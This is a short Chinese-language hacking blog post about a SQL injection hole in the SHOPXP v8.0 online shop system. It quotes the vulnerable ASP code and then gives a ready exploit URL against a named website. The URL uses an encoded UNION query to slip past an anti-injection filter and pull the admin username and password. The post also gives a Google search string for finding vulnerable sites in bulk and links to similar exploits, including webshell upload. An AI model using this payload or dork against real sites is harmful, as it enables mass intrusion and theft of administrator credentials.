上次说了SHOPXP网上购物系统 7.4的注入漏洞 跟新了,看看8.0的
商城系统差不多都是互相抄的。漏洞和网趣的那个一样,不过人家加了一个枫叶的防注入,没什么用处。
在TEXTBOX2.ASP TEXTBOX3.ASP页面的newsid变量为判断
复制代码 Action=LCase(Request.QueryString("Action"))
newsID=Request.QueryString("newsID")
If request("action")="modify" Then
set rs=server.createobject("adodb.recordset")
sql="select * from shopxp_news where newsid="&newsid
rs.open sql,conn,1,1
If Not rs.Eof Then
Content=rs("newscontent")
End If
Response.Write Content
End If
构造URL注入即可。
exp:
http://www.gn918.cn/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
批量
google:inurl:shopxp_news.asp
只显示10条记录相关文章
shopxp pinglun.asp 注入漏洞 (浏览: 10922, 评论: 0)
ShopXp CMS上传拿Webshell (浏览: 10584, 评论: 0)
SHOPXP网上购物系统 v8.0 (浏览: 13521, 评论: 0)
Shopxp v8.0 SQL Injection 0day (浏览: 11597, 评论: 0)
shopxp7.4 oday (未完成) (浏览: 7, 评论: 0)